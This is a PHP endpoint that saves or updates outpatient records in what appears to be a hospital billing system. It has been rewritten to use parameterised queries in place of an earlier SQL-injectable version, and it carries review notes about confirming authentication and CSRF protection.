name :
opd_saveupdate.php
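<?php
/**
 * OPD patient entry endpoint.
 *
 * Reads the posted form, then either
 *   - btnopration = "SAVE":   calls the stored procedure sp_patiententry and,
 *                             when an appointment id is posted, marks that
 *                             appointment as paid; or
 *   - btnopration = "UPDATE": updates patientmastertb (by uhid) and
 *                             patientdetailstb (by fileno).
 * The response body is a JSON-encoded status string.
 *
 * Every request value reaches the database as a bound parameter. The original
 * script concatenated $_POST values straight into the SQL text, so any field
 * could rewrite the statement (SQL injection against patient and billing data).
 */
require_once "config.php";
session_start();

// NOTE(review): nothing in this file verifies that a user is logged in before
// patient records are written; confirm config.php enforces authentication (and
// that the request is protected against CSRF), otherwise add the check here.
$userid          = isset($_SESSION['userid']) ? (string) $_SESSION['userid'] : '';
$financialyearid = isset($_SESSION['financialyearid']) ? (string) $_SESSION['financialyearid'] : '';

// Fetch one posted field as a string; missing or non-scalar fields become ''.
$field = static function ($key) {
    return (isset($_POST[$key]) && is_scalar($_POST[$key])) ? (string) $_POST[$key] : '';
};

$msg = "";

// 'i' is minutes. The original format string used 'm' (month) in the minutes slot.
$creationdatetime = date("Y-m-d H:i:s");

$odate = date_create($field('trandate'));
if ($odate === false) {
    // An unparseable date previously fell through to date_format(false, ...).
    echo json_encode("invalid transaction date");
    exit;
}
$opdate = date_format($odate, "Y-m-d");

$opdtime       = $field('trantime');
$mobileno      = $field('mobileno');
$patpre        = $field('patpre');
$patientname   = $field('patientname');
$patnewold     = $field('patnewold');
$gender        = $field('gender');
$age           = $field('age');
$agey          = $field('agey');
$address       = $field('address');
$departmentid  = $field('department');
$doctorid      = $field('doctor');
$pattype       = $field('pattype');
$amount        = $field('amount');
$discount      = $field('discount');
$netamount     = $field('netamount');
$receiveamt    = $field('receiveamt');
$paymentmode   = $field('paymentmode');
$expirydate    = $field('expirydate');
$uhid          = $field('uhid');
$fileno        = $field('fileno');
$transactionno = $field('transactionno');
$btnopration   = $field('btnopration');
$appid         = $field('appid');

// The bank drop-down posts its placeholder label when nothing was chosen.
$bankid = ($field('bank') === "Select Bank") ? '0' : $field('bank');

// NOTE(review): the updates below run through $connect (the PDO handle this
// script already uses) because updaterecord($conn, $query) only accepts a
// finished SQL string and cannot bind parameters. Confirm $connect and $conn
// point at the same database.

if ($btnopration == "SAVE") {
    // Positional arguments of sp_patiententry, in the original order; the
    // empty strings and the '0', ' ' and '1' literals are kept as they were.
    $args = [
        $opdate, $opdtime, 'OPD',
        $fileno, $uhid, $patpre, $patientname, '', '', $mobileno, '', $address, $pattype, '', '', $gender, $agey, $age,
        $amount, $discount, '0', $netamount, $receiveamt, $patnewold, $expirydate, '', '', $paymentmode, $bankid,
        $transactionno, $financialyearid, '', $doctorid, ' ', $departmentid, '1', $userid,
    ];
    $placeholders = implode(',', array_fill(0, count($args), '?'));

    $stmt = $connect->prepare("call sp_patiententry(" . $placeholders . ")");
    $stmt->execute($args);
    $stmt->fetchAll(PDO::FETCH_ASSOC);
    // Release the procedure's result sets so the connection can run the next statement.
    $stmt->closeCursor();

    if ($appid != "") {
        $stmt = $connect->prepare("Update appointmenttb set paymentstatus=1 where appid=?");
        $stmt->execute([$appid]);
    }

    $msg = "patient save successfully";
} else if ($btnopration == "UPDATE") {
    // Column/value pairing is unchanged from the original statement
    // (agey receives $age, pntageyrs receives $agey).
    $stmt = $connect->prepare(
        "Update patientmastertb set PntPre=:patpre, name=:name, mobile=:mobile, address1=:address, "
        . "sex=:sex, agey=:age, pntageyrs=:agey, modificationdatetime=:modified where uhid=:uhid"
    );
    $result = $stmt->execute([
        ':patpre'   => $patpre,
        ':name'     => $patientname,
        ':mobile'   => $mobileno,
        ':address'  => $address,
        ':sex'      => $gender,
        ':age'      => $age,
        ':agey'     => $agey,
        ':modified' => $creationdatetime,
        ':uhid'     => $uhid,
    ]);

    if ($result == true) {
        // Resolve the posted department, doctor and bank names to their master ids.
        $stmt = $connect->prepare(
            "SELECT accountmasterid from mastertb where accountname=? and status=0 and Identifier=9"
        );
        $stmt->execute([$departmentid]);
        $depid = (string) $stmt->fetchColumn(); // '' when no row matched

        $stmt = $connect->prepare(
            "SELECT accountmasterid from mastertb where accountname=? and departmentid=? "
            . "and doctortype='Consultant' and status=0 and Identifier=3"
        );
        $stmt->execute([$doctorid, $depid]);
        $examinedbyid = (string) $stmt->fetchColumn();

        $stmt = $connect->prepare(
            "SELECT accountmasterid from mastertb where accountname=? and status=0 and Identifier=8"
        );
        $stmt->execute([$bankid]);
        $bank = $stmt->fetchColumn();
        if ($bank === false || $bank === null || $bank === '') {
            $bank = 0;
        }

        $stmt = $connect->prepare(
            "Update patientdetailstb set opddate=:opddate, opdtime=:opdtime, PntPre=:patpre, name=:name, "
            . "mobile=:mobile, address1=:address, sex=:sex, agey=:age, pntageyrs=:agey, "
            . "patienttype=:pattype, amount=:amount, discount=:discount, netamount=:netamount, "
            . "receiveamt=:receiveamt, expirydate=:expirydate, departmentid=:depid, "
            . "examinedbyid=:examinedbyid, paymentmode=:paymentmode, bankid=:bankid, "
            . "chequeno=:chequeno, modificationdatetime=:modified where fileno=:fileno"
        );
        $stmt->execute([
            ':opddate'      => $opdate,
            ':opdtime'      => $opdtime,
            ':patpre'       => $patpre,
            ':name'         => $patientname,
            ':mobile'       => $mobileno,
            ':address'      => $address,
            ':sex'          => $gender,
            ':age'          => $age,
            ':agey'         => $agey,
            ':pattype'      => $pattype,
            ':amount'       => $amount,
            ':discount'     => $discount,
            ':netamount'    => $netamount,
            ':receiveamt'   => $receiveamt,
            ':expirydate'   => $expirydate,
            ':depid'        => $depid,
            ':examinedbyid' => $examinedbyid,
            ':paymentmode'  => $paymentmode,
            ':bankid'       => (string) $bank,
            ':chequeno'     => $transactionno,
            ':modified'     => $creationdatetime,
            ':fileno'       => $fileno,
        ]);

        $msg = "patient update successfully";
    }
}

echo json_encode($msg);
?>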